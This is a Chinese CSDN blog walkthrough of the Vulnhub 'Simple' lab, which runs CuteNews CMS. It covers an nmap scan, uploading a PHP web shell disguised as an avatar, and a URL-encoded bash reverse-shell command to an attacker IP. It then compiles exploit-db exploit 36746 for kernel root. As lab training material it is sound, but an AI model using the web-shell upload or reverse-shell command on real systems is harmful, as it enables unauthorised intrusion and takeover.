[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

于 2024-07-13 18:55:19 发布
阅读量79 收藏
点赞数 1
分类专栏: Vulnhub 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140404587
版权

信息收集

IP AddressOpening Ports
192.168.8.104TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

image.png

注册用户登录

image-1.png

image-2.png

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

image-3.png

image-4.png

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

image-5.png

权限提升

$ cat /etc/os-release

image-7.png

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

image-6.png

Мартин.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一、详细Python3.8+PyQt5+pyqt5-tools+Pycharm配置
星如雨落
08-02 1万+
个人使用环境 WIN10x64系统,Python3.8,PyCharm2020.01.03 安装过程 一、安装Python3.8 (自己参考其他教程) 二、安装PyQt5 然后在cmd下输入指令 pip install PyQt5 也可以输入这个指令 pip install PyQt5 -i https://pypi.douban.com/simple (后面是豆瓣的镜像地址,是为了加快下载速度) 提示你更新pip,就按照提示更新(这步骤是可选的,看个人需求) 在cmd下输入 python -m p
rtsp-simple-server + srs搭建流媒体服务器
qq_23350817的博客
07-29 6929
1、下载rtsp-simple-server 我下载的是windows版本的。下载完后直接运行exe文件即可启动。2、ubuntu 16.04环境下载、编译、运行SRS 3、使用ffmpeg给rtsp-simple-server推流 4、使用ffmpeg从rtsp-simple-server拉取rtsp流并转换为rtmp流后推送到srs服务器 5、从srs服务器拉流 或者用VLC打开RTMP直播流......
Android系统启动过程-uBoot+Kernel+Android
coder
06-13 1万+
转载自:http://www.cnblogs.com/pngcui/p/4665106.html 摘要:本文是参考大量网上资源在结合自己查看源代码总结出来的,让自己同时也让大家加深对Android系统启动过程有一个更加深入的了解!再次强调,本文的大多数功劳应归功于那些原创者们,同时一些必要的参考链接我会一一附上。   注:由于本人采用Exynos4412开发板学习,所
ERROR: torch-1.4.0+cpu-cp38-cp38m-win_amd64.whl is not a supported wheel on this platform.
特浓悠哈的博客
10-30 1万+
输入老师给的下载pytorch和torchvision的命令报错找不到版本 pip install torch==1.4.0 torchvision==0.5.0 -i https://pypi.douban.com/simple 报错: could not find a version that satisfies the requirement torch 然后找教程去它的whl下载的网址下载,我直接下载放到D盘 whl下载的网址 下载后打开命令行 进入对应下载地址(D:) 输入下方命令 pip
MySQL索引原理及BTree(B-/+Tree)结构详解
热门推荐
一念永恒
11-20 8万+
目录 摘要 数据结构及算法基础 索引的本质 B-Tree和B+Tree B-Tree B+Tree 带有顺序访问指针的B+Tree 为什么使用B-Tree(B+Tree) 主存存取原理 磁盘存取原理 局部性原理与磁盘预读 B-/+Tree索引的性能分析 MySQL索引实现 MyISAM索引实现 InnoDB索引实现 索引使用策略及优化 示例数据库 最左前缀原理与...
一二三应用开发平台文件处理设计与实现系列之2——前端集成vue-simple-uploader
学海无涯,行者无疆
06-06 5545
文件的上传是系统的必备功能,Element提供了上传组件upload,也基本能满足常见常用的文件上传功能,特别是应对小型文件(10M以下)的处理。但如果是遇到要求更多更高的场景,上传几百兆甚至上G的视频文件,要求分块上传,能断点续传,显示进度,能暂停,能重试……这时候就显得乏力了。如果基于upload实现,需要附加大量的二次开发,这未必是一种最佳实现方案。 这时候,就需要找一找看一看,市面上是否有现成的“轮子”可用了。 接下来,分两篇,分别介绍下前端实现和后端实现,今天首先来说下前端那些事儿。
基于 Vue + Element-UI + Vue-Simple-Upload 实现仿百度网盘文档管理
qiaoba11的博客
12-30 8561
效果图: 预览地址:www.ctrlcv.vip 文章详情:链接
cv2.error: /build/opencv-L2vuMj/opencv-3.2.0+dfsg/modules/highgui/src/window.cpp:304: error: (-215)
绑个蝴蝶结的博客
12-19 9071
两条命令 pip search opencv 这句话的意思是先找一下pip库里面对应的和opencv有关的一些包,经过寻找,发现opencv-python是我们要安装的包,之后 sudo pip install -i https://pypi.tuna.tsinghua.edu.cn/simple opencv-python 安装完毕之后cv2 就不会报错了,其中https://pypi.tun...
Vulnhub DC-7
Pai_Space
03-26 5300
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
css-1333-simpleDB-lab1+lab2实验代码
06-20
总的来说,"css-1333-simpleDB-lab1+lab2实验代码"为学生提供了一个实践数据库理论的绝佳平台,通过这个实验,不仅可以巩固理论知识,还能提升编程和问题解决能力。对于希望进一步深入数据库领域的学习者,这是一个...
simple-cache(文档+JAR+JAR源码)
04-18
simple-cache(文档+JAR+JAR源码)simple-cache(文档+JAR+JAR源码)simple-cache(文档+JAR+JAR源码)simple-cache(文档+JAR+JAR源码)simple-cache(文档+JAR+JAR源码)simple-cache(文档+JAR+JAR源码)simple-cache(文档+...
uni-simple-router实现简单的路由守卫
04-21
本示例“uni-simple-router实现简单的路由守卫”旨在教你如何利用uni-simple-router库来实现这一功能。uni-simple-router是专为uni-app设计的一个轻量级路由管理插件,它提供了一些强大的特性,包括路由守卫,使我们...
Simple-Razor-CMS:RazorC CMS 项目的文件夹
07-08
Simple-Razor-CMS 是一个基于JavaScript的轻量级内容管理系统(CMS),主要使用Razor语法进行视图渲染。这个项目的核心目标是提供一个易于使用、快速开发的平台,用于构建和管理网站内容。通过了解其文件结构,我们...
Simple-CMS: Simplicity In Motion-开源
05-15
Simple-CMS:轻量级内容管理系统的开源魅力 在当今数字化时代,内容管理系统的存在显得尤为重要,它们使得网站的建设和维护变得更加便捷。"Simple-CMS:Simplicity In Motion"便是一个专注于提供简单易用体验的开源...
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 637
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
最新发布
Snu77的博客
07-11 1万+
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
Zabbix自动发现
Lzcsfg的博客
07-08 754
在 Zabbix 中,自动发现(Auto Discovery)是一种强大的功能,用于自动识别和监控网络设备、服务或应用程序中的动态变化。通过自动发现功能,Zabbix 可以自动添加、配置和监控新的网络节点或服务,大大简化了管理和监控大规模环境的复杂性。
从零开始做题:logtime
weixin_44626085的博客
07-10 239
给出1个pcapng文件。
vue-simple-uploader+php
04-01
As an AI language model, I cannot provide personal opinions or preferences. However, I can provide information about Vue Simple Uploader and PHP. Vue Simple Uploader is a Vue.js component that achieves file uploading with ease. It is a lightweight and flexible uploader that supports drag and drop, progress bars, multiple file uploads, and image previews. PHP, on the other hand, is a server-side scripting language that is used to create dynamic web pages. It is widely used for developing web applications, including e-commerce sites, content management systems, and social networking sites. In the context of Vue Simple Uploader, PHP can be used as the backend language to handle file uploads and process them according to your application's needs. You can use PHP to receive the uploaded files, validate them, and store them on the server or in a database. You can also use PHP to resize or manipulate images before storing them. Overall, Vue Simple Uploader and PHP can be used together to create a robust file uploading system for your web application.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值